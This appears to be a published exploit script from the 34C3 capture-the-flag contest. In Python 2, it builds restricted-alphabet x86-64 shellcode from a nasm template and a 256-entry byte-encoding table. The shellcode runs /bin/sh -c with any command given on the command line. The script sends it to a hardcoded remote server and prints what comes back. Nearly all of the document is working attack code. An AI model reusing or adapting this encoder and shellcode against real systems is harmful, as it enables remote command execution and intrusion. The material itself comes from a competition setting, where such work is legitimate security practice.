@spq
Created January 1, 2018 16:18
34c3ctf exploits
#!/usr/bin/env python2
import os
import socket
import struct
import subprocess
import sys
import tempfile
import telnetlib
import time
HOST, PORT = "35.198.126.67", 4444


def p32(v):
    """Pack ``v`` as a little-endian unsigned 32-bit value."""
    return struct.pack("<I", v)


def p64(v):
    """Pack ``v`` as a little-endian unsigned 64-bit value."""
    return struct.pack("<Q", v)


# Neither p32 nor p64 is referenced elsewhere in this file; they are kept
# for compatibility. The connection is opened at import time and the rest
# of the script writes to ``s`` directly.
s = socket.create_connection((HOST, PORT))
# nasm source template (BITS 64) for the payload. It is a runtime string: the
# script writes it to a file and assembles it, so the ';' lines inside are
# assembler comments, not Python ones. "$$$COMMAND$$$" is replaced further
# down with the lines get_asm_for_val produces for each byte of sys.argv[1].
shellcode = """
BITS 64
;rcx contains start of the shellcode
;debug
dbg:
stc
stc
stc
stc
stc
stc
stc
stc
stc
stc
;jc dbg
;end debug
push rcx
pop rsi
jump3:
nop
nop
nop
nop
lodsb
xor al, 0x90
jump2:
jc jump3
add al, 0x90
adc al, 0x90
xor al, 0x90
add al, 0x90
xor al, 0x90
jump1:
jc jump2
add al, 0x90
xor al, 0x90
cmp al,0x90
nop
stc
jnz jump1
found_syscall:
std
lodsb
cld
push rsi
pop rbx
; push strings
mov eax, 0x90909090
xor eax, 0x90909090
;these spots will be overwritten with our argv strings
; command (max 127 chars)
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rsp
pop rcx
; -c
push rax
push rsp
pop rbp
; /bin/sh
push rax
push rsp
pop rdi
push rdi
; write "/bin/sh", 0
; /
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
stosb
; b
mov al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
stosb
; i
mov al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
sbb al, 0x90
sbb al, 0x90
stosb
; n
mov al, 0x90
stc
sbb al, 0x90
sbb al, 0x90
stosb
; /
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
add al, 0x90
stosb
; s
mov al, 0x90
xor al, 0x90
sub al, 0x90
adc al, 0x90
sub al, 0x90
adc al, 0x90
adc al, 0x90
xor al, 0x90
sub al, 0x90
stosb
; h
mov al, 0x90
stc
adc al, 0x90
adc al, 0x90
stc
adc al, 0x90
adc al, 0x90
stc
adc al, 0x90
adc al, 0x90
xor al, 0x90
sub al, 0x90
adc al, 0x90
adc al, 0x90
xor al, 0x90
stosb
; 0 byte
mov al, 0x90
xor al, 0x90
stosb
; /bin/sh written
; write "-c", 0
; -
mov al, 0x90
xor al, 0x90
sub al, 0x90
sbb al, 0x90
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
stosb
; c
mov al, 0x90
stc
adc al, 0x90
adc al, 0x90
add al, 0x90
adc al, 0x90
add al, 0x90
stosb
; 0 bytes
mov al, 0x90
xor al, 0x90
stosb
stosb
stosb
stosb
stosb
stosb
; write command
;;;;;;;; COMMAND GOES HERE
$$$COMMAND$$$
;;;;;;;;; END OF COMMAND
; 0 byte
mov al, 0x90
xor al, 0x90
stosb
; all strings written
pop rdi ; recover /bin/sh ptr
; write argv pointers
push rax
push rsp
pop rdx ; 0 pointer for envp
push rcx
push rbp
push rdi
push rsp
pop rsi ; argv pointer
; rdi, rsi and rdx initialized
; mov rax, 59
mov eax, 0x90909090
xor eax, 0x90909090
mov al, 0x90
add al, 0x90
sbb al, 0x90
or al, 0x90
stc
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
sbb al, 0x90
sub al, 0x90
sbb al, 0x90
push rbx
ret
"""
# Per-byte mnemonic sequences, indexed 0x00-0xff. get_asm_for_val expands
# each entry into nasm lines terminated by "stosb".
shortest_opcodes = {
    0x00: "mov xor",
    0x01: "mov xor sub adc",
    0x02: "mov xor sub adc adc xor",
    0x03: "mov xor sub adc adc xor sub adc",
    0x04: "mov xor sub adc adc xor sub adc adc xor",
    0x05: "mov xor sub adc adc xor sub adc adc xor sub adc",
    0x06: "mov stc adc adc stc adc adc add adc add adc or xor",
    0x07: "mov stc adc adc stc adc adc stc adc adc add adc or xor",
    0x08: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub sbb",
    0x09: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb",
    0x0a: "mov add sbb sbb sbb sub sbb sub sbb sub sbb",
    0x0b: "mov stc sbb sbb sub sbb sub sbb sub sbb",
    0x0c: "mov xor sub sbb sbb sub sbb sub sbb",
    0x0d: "mov add sbb or add sbb sbb",
    0x0e: "mov add sbb or stc sbb",
    0x0f: "mov add sbb or xor",
    0x10: "mov xor sub and",
    0x11: "mov xor sub and sub adc",
    0x12: "mov add sbb and sub adc adc",
    0x13: "mov add or add adc add adc add adc",
    0x14: "mov add adc add adc add adc add adc",
    0x15: "mov stc adc adc add adc add adc add adc",
    0x16: "mov stc adc adc stc adc adc add adc add adc",
    0x17: "mov stc adc adc stc adc adc stc adc adc add adc",
    0x18: "mov stc adc adc stc adc adc stc adc adc stc adc adc",
    0x19: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub sbb",
    0x1a: "mov add sbb or stc sbb sub sbb sbb sub sbb sub sbb",
    0x1b: "mov add sbb sbb sbb or add sbb sbb or add add",
    0x1c: "mov add sbb add sbb sbb sbb or add add",
    0x1d: "mov add sbb sbb sbb or add add",
    0x1e: "mov add sbb add sbb add",
    0x1f: "mov add sbb add",
    0x20: "mov add",
    0x21: "mov stc adc",
    0x22: "mov stc adc adc xor",
    0x23: "mov stc adc adc xor sub adc",
    0x24: "mov stc adc adc xor sub adc adc xor",
    0x25: "mov stc adc adc xor sub adc adc xor sub adc",
    0x26: "mov stc adc adc add adc add adc add adc adc or xor",
    0x27: "mov stc adc adc stc adc adc add adc add adc adc or xor",
    0x28: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb sbb",
    0x29: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb",
    0x2a: "mov add sbb sbb sbb stc sbb sbb sub sbb",
    0x2b: "mov add sbb sbb sbb sub sbb sub sbb",
    0x2c: "mov stc sbb sbb sub sbb sub sbb",
    0x2d: "mov xor sub sbb sbb sub sbb",
    0x2e: "mov add sbb add sbb or add",
    0x2f: "mov add sbb or add",
    0x30: "mov xor sub and add add",
    0x31: "mov xor sub and stc adc add",
    0x32: "mov xor sub and sub adc adc add",
    0x33: "mov add sbb and sub adc adc adc add",
    0x34: "mov add sbb and sub adc adc adc stc adc",
    0x35: "mov add adc add adc add adc add adc adc add",
    0x36: "mov stc adc adc add adc add adc add adc adc add",
    0x37: "mov stc adc adc stc adc adc add adc add adc adc add",
    0x38: "mov stc adc adc stc adc adc stc adc adc add adc adc add",
    0x39: "mov add sbb or add sbb sbb stc sbb sbb sbb sub sbb",
    0x3a: "mov add sbb or add sbb sbb sub sbb sbb sub sbb",
    0x3b: "mov add sbb or stc sbb sub sbb sbb sub sbb",
    0x3c: "mov add sbb or xor sub sbb sbb sub sbb",
    0x3d: "mov xor sub and sub sbb sbb sub sbb",
    0x3e: "mov add sbb add sbb xor add add",
    0x3f: "mov add sbb xor add add",
    0x40: "mov add or add",
    0x41: "mov add adc add",
    0x42: "mov stc adc adc add",
    0x43: "mov stc adc adc stc adc",
    0x44: "mov stc adc adc stc adc adc xor",
    0x45: "mov stc adc adc stc adc adc xor sub adc",
    0x46: "mov stc adc adc stc adc adc xor sub adc adc xor",
    0x47: "mov stc adc adc stc adc adc add adc add adc adc or add",
    0x48: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb sbb",
    0x49: "mov add sbb sbb sbb or add sbb sbb stc sbb sbb",
    0x4a: "mov add sbb add sbb sbb sbb stc sbb sbb",
    0x4b: "mov add sbb sbb sbb stc sbb sbb",
    0x4c: "mov add sbb sbb sbb sub sbb",
    0x4d: "mov stc sbb sbb sub sbb",
    0x4e: "mov xor sub sbb sbb",
    0x4f: "mov xor sub sbb xor",
    0x50: "mov xor sub xor sub",
    0x51: "mov xor sub adc sub xor sub",
    0x52: "mov xor sub and stc adc add adc add",
    0x53: "mov xor sub and sub adc adc add adc add",
    0x54: "mov add sbb and sub adc adc adc add adc add",
    0x55: "mov add sbb and sub adc adc adc stc adc adc add",
    0x56: "mov add adc add adc add adc add adc adc add adc add",
    0x57: "mov stc adc adc add adc add adc add adc adc add adc add",
    0x58: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub sbb sbb",
    0x59: "mov stc sbb sbb sub sbb sub sbb sub sbb sub sbb sbb",
    0x5a: "mov add sbb or add sbb sbb stc sbb sbb sbb",
    0x5b: "mov add sbb or add sbb sbb sub sbb sbb",
    0x5c: "mov add sbb or stc sbb sub sbb sbb",
    0x5d: "mov add sbb or xor sub sbb sbb",
    0x5e: "mov xor sub and sub sbb sbb",
    0x5f: "mov add sbb and sub sbb",
    0x60: "mov xor sub or xor",
    0x61: "mov add or add adc add",
    0x62: "mov add adc add adc add",
    0x63: "mov stc adc adc add adc add",
    0x64: "mov stc adc adc stc adc adc add",
    0x65: "mov stc adc adc stc adc adc stc adc",
    0x66: "mov stc adc adc stc adc adc stc adc adc xor",
    0x67: "mov stc adc adc stc adc adc stc adc adc xor sub adc",
    0x68: "mov stc adc adc stc adc adc stc adc adc xor sub adc adc xor",
    0x69: "mov add sbb sbb sbb or add sbb sbb or add sbb sbb",
    0x6a: "mov add sbb add sbb sbb sbb or add sbb sbb",
    0x6b: "mov add sbb sbb sbb or add sbb sbb",
    0x6c: "mov add sbb add sbb sbb sbb",
    0x6d: "mov add sbb sbb sbb",
    0x6e: "mov stc sbb sbb",
    0x6f: "mov stc sbb xor",
    0x70: "mov xor sub",
    0x71: "mov xor sub adc sub",
    0x72: "mov xor sub adc adc xor sub",
    0x73: "mov xor sub adc sub adc adc xor sub",
    0x74: "mov xor sub adc adc xor sub adc adc xor sub",
    0x75: "mov add sbb and sub adc adc adc add adc add adc xor",
    0x76: "mov add sbb and sub adc adc adc stc adc adc add adc xor",
    0x77: "mov add adc add adc add adc add adc adc add adc add adc xor",
    0x78: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub sbb sub",
    0x79: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb sub",
    0x7a: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub",
    0x7b: "mov add sbb or add sbb sbb stc sbb sbb xor",
    0x7c: "mov add sbb or add sbb sbb stc sbb",
    0x7d: "mov add sbb or add sbb sbb sub",
    0x7e: "mov add sbb or stc sbb sub",
    0x7f: "mov add sbb or xor sub",
    0x80: "mov add sbb and",
    0x81: "mov add sbb and sub adc",
    0x82: "mov add or add adc add adc add",
    0x83: "mov add adc add adc add adc add",
    0x84: "mov stc adc adc add adc add adc add",
    0x85: "mov stc adc adc stc adc adc add adc add",
    0x86: "mov stc adc adc stc adc adc stc adc adc add",
    0x87: "mov stc adc adc stc adc adc stc adc adc stc adc",
    0x88: "mov stc adc adc stc adc adc stc adc adc stc adc adc sub",
    0x89: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub sbb sub",
    0x8a: "mov add sbb add sbb sbb sbb or add sbb sbb or add",
    0x8b: "mov add sbb sbb sbb or add sbb sbb or add",
    0x8c: "mov add sbb add sbb sbb sbb or add",
    0x8d: "mov add sbb sbb sbb or add",
    0x8e: "mov add sbb add sbb",
    0x8f: "mov add sbb",
    0x90: "mov",
    0x91: "mov stc adc sub",
    0x92: "mov xor sub adc adc",
    0x93: "mov xor sub adc sub adc adc",
    0x94: "mov xor sub adc adc xor sub adc adc",
    0x95: "mov xor sub adc sub adc adc xor sub adc adc",
    0x96: "mov stc adc adc stc adc adc add adc add adc or",
    0x97: "mov stc adc adc stc adc adc stc adc adc add adc or",
    0x98: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb stc sbb",
    0x99: "mov add sbb sbb sbb stc sbb sbb stc sbb sbb sub",
    0x9a: "mov add sbb sbb sbb stc sbb sbb sub sbb sub",
    0x9b: "mov add sbb sbb sbb sub sbb sub sbb sub",
    0x9c: "mov stc sbb sbb sub sbb sub sbb sub",
    0x9d: "mov add sbb or add sbb sbb or",
    0x9e: "mov add sbb add sbb or",
    0x9f: "mov add sbb or",
    0xa0: "mov xor sub and add",
    0xa1: "mov xor sub and stc adc",
    0xa2: "mov xor sub and sub adc adc",
    0xa3: "mov add sbb and sub adc adc adc",
    0xa4: "mov add or add adc add adc add adc adc",
    0xa5: "mov add adc add adc add adc add adc adc",
    0xa6: "mov stc adc adc add adc add adc add adc adc",
    0xa7: "mov stc adc adc stc adc adc add adc add adc adc",
    0xa8: "mov stc adc adc stc adc adc stc adc adc add adc adc",
    0xa9: "mov add sbb or add sbb sbb stc sbb sbb sbb sub sbb sub",
    0xaa: "mov add sbb or add sbb sbb sub sbb sbb sub sbb sub",
    0xab: "mov add sbb or stc sbb sub sbb sbb sub sbb sub",
    0xac: "mov add sbb add sbb sbb sbb or add xor add",
    0xad: "mov add sbb add sbb xor add add sbb",
    0xae: "mov add sbb add sbb xor add",
    0xaf: "mov add or add sbb",
    0xb0: "mov add or",
    0xb1: "mov add adc",
    0xb2: "mov stc adc adc",
    0xb3: "mov stc adc sub adc adc",
    0xb4: "mov stc adc adc xor sub adc adc",
    0xb5: "mov stc adc sub adc adc xor sub adc adc",
    0xb6: "mov stc adc adc add adc add adc add adc adc or",
    0xb7: "mov stc adc adc stc adc adc add adc add adc adc or",
    0xb8: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb sbb or",
    0xb9: "mov add sbb add sbb sbb sbb stc sbb sbb stc sbb",
    0xba: "mov add sbb sbb sbb stc sbb sbb stc sbb",
    0xbb: "mov add sbb sbb sbb stc sbb sbb sub",
    0xbc: "mov add sbb sbb sbb sub sbb sub",
    0xbd: "mov stc sbb sbb sub sbb sub",
    0xbe: "mov xor sub sbb sbb sub",
    0xbf: "mov add sbb xor add or",
    0xc0: "mov xor sub xor sub sub",
    0xc1: "mov xor sub and add add adc",
    0xc2: "mov xor sub and stc adc add adc",
    0xc3: "mov xor sub and sub adc adc add adc",
    0xc4: "mov add sbb and sub adc adc adc add adc",
    0xc5: "mov add sbb and sub adc adc adc stc adc adc",
    0xc6: "mov add adc add adc add adc add adc adc add adc",
    0xc7: "mov stc adc adc add adc add adc add adc adc add adc",
    0xc8: "mov stc adc adc stc adc adc add adc add adc adc add adc",
    0xc9: "mov add sbb or add sbb sbb stc sbb sbb sbb stc sbb",
    0xca: "mov add sbb or add sbb sbb stc sbb sbb sbb sub",
    0xcb: "mov add sbb or add sbb sbb sub sbb sbb sub",
    0xcc: "mov add sbb or stc sbb sub sbb sbb sub",
    0xcd: "mov add sbb or xor sub sbb sbb sub",
    0xce: "mov xor sub and sub sbb sbb sub",
    0xcf: "mov add sbb and sub sbb sub",
    0xd0: "mov add or add or",
    0xd1: "mov add or add adc",
    0xd2: "mov add adc add adc",
    0xd3: "mov stc adc adc add adc",
    0xd4: "mov stc adc adc stc adc adc",
    0xd5: "mov stc adc sub adc adc stc adc adc",
    0xd6: "mov stc adc adc stc adc adc xor sub adc adc",
    0xd7: "mov stc adc sub adc adc stc adc adc xor sub adc adc",
    0xd8: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb sbb or",
    0xd9: "mov add sbb add sbb sbb sbb or add sbb sbb stc sbb",
    0xda: "mov add sbb add sbb sbb sbb stc sbb sbb or",
    0xdb: "mov add sbb add sbb sbb sbb stc sbb",
    0xdc: "mov add sbb sbb sbb stc sbb",
    0xdd: "mov add sbb sbb sbb sub",
    0xde: "mov stc sbb sbb sub",
    0xdf: "mov xor sub sbb",
    0xe0: "mov xor sub sub",
    0xe1: "mov xor sub adc sub sub",
    0xe2: "mov xor sub adc adc xor sub sub",
    0xe3: "mov xor sub adc sub adc adc xor sub sub",
    0xe4: "mov xor sub and sub adc adc add adc add adc",
    0xe5: "mov add sbb and sub adc adc adc add adc add adc",
    0xe6: "mov add sbb and sub adc adc adc stc adc adc add adc",
    0xe7: "mov add adc add adc add adc add adc adc add adc add adc",
    0xe8: "mov add sbb sbb sbb stc sbb sbb sub sbb sub sbb sub sbb",
    0xe9: "mov add sbb sbb sbb sub sbb sub sbb sub sbb sub sbb",
    0xea: "mov add sbb or add sbb sbb stc sbb sbb sbb add",
    0xeb: "mov add sbb or add sbb sbb stc sbb sbb",
    0xec: "mov add sbb or add sbb sbb sub sbb",
    0xed: "mov add sbb or stc sbb sub sbb",
    0xee: "mov add sbb or xor sub sbb",
    0xef: "mov xor sub and sub sbb",
    0xf0: "mov xor sub or",
    0xf1: "mov xor sub adc sub or",
    0xf2: "mov add or add adc add adc",
    0xf3: "mov add adc add adc add adc",
    0xf4: "mov stc adc adc add adc add adc",
    0xf5: "mov stc adc adc stc adc adc add adc",
    0xf6: "mov stc adc adc stc adc adc stc adc adc",
    0xf7: "mov stc adc sub adc adc stc adc adc stc adc adc",
    0xf8: "mov stc adc adc stc adc adc stc adc adc xor sub adc adc",
    0xf9: "mov add sbb add sbb sbb sbb or add sbb sbb or add sbb",
    0xfa: "mov add sbb add sbb sbb sbb or add sbb sbb or",
    0xfb: "mov add sbb add sbb sbb sbb or add sbb",
    0xfc: "mov add sbb add sbb sbb sbb or",
    0xfd: "mov add sbb add sbb sbb",
    0xfe: "mov add sbb sbb",
    0xff: "mov stc sbb",
}


def get_asm_for_val(n):
    """Return the nasm lines that produce byte value ``n`` and store it.

    Looks up ``shortest_opcodes[n]``, gives every mnemonic other than
    ``stc``/``clc`` the operands ``al, 0x90``, and appends a final
    ``stosb``. Every instruction, including the last, ends with a newline.

    Raises:
        KeyError: if ``n`` is not a key of ``shortest_opcodes``.
    """
    flag_only = ("stc", "clc")
    lines = []
    for mnemonic in shortest_opcodes[n].split(" "):
        if mnemonic in flag_only:
            lines.append(mnemonic)
        else:
            lines.append(mnemonic + " al, 0x90")
    lines.append("stosb")
    return "\n".join(lines) + "\n"
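command = sys.argv[1]
# Expand every byte of the command into the assembler lines that emit it and
# splice them into the template.
encoded_command = "\n".join(map(get_asm_for_val, map(ord, command)))
asm_source = shellcode.replace("$$$COMMAND$$$", encoded_command)

# mkstemp gives a private, unpredictable file. The previous fixed name in the
# shared /tmp directory could be pre-created or swapped by another local user,
# and the handle was never closed.
asm_fd, asm_path = tempfile.mkstemp(suffix=".asm")
try:
    with os.fdopen(asm_fd, "wb") as asm_file:
        asm_file.write(asm_source)
    # Same nasm | ndisasm pipeline, but as argument lists (no shell) with the
    # listing kept in memory, and both exit codes checked instead of silently
    # reading a stale or empty listing file.
    nasm = subprocess.Popen(["nasm", "-o", "/dev/stdout", asm_path],
                            stdout=subprocess.PIPE)
    ndisasm = subprocess.Popen(["ndisasm", "-b", "64", "-"],
                               stdin=nasm.stdout, stdout=subprocess.PIPE)
    nasm.stdout.close()  # let nasm see a broken pipe if ndisasm exits early
    listing = ndisasm.communicate()[0]
    nasm_rc = nasm.wait()
    if nasm_rc != 0 or ndisasm.returncode != 0:
        sys.exit("nasm/ndisasm failed (rc %d/%d); nothing sent"
                 % (nasm_rc, ndisasm.returncode))
finally:
    os.unlink(asm_path)

# Each listing line is "<10-column field><hex bytes> <mnemonic>"; the first
# field (presumably ndisasm's offset column) is dropped. Only the first byte of
# every instruction is kept; any later byte that is not 0x90 means the encoding
# assumption did not hold for that line, so it is reported before sending.
shellcode_bytes = []
for line in listing.split("\n"):
    if not line:
        continue
    line = line[10:]
    hexbytes = line.split(" ")[0]
    mnem = line[len(hexbytes):].lstrip(" ")
    code = hexbytes.decode("hex")
    if code[1:].replace("\x90", ""):
        print "WARN:", code.encode("hex"), mnem
    shellcode_bytes.append(code[0])
shellcode = "".join(shellcode_bytes)

s.sendall(shellcode)
s.shutdown(socket.SHUT_WR)
# Relay whatever the remote side returns until it closes the connection.
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    sys.stdout.write(chunk)
s.close()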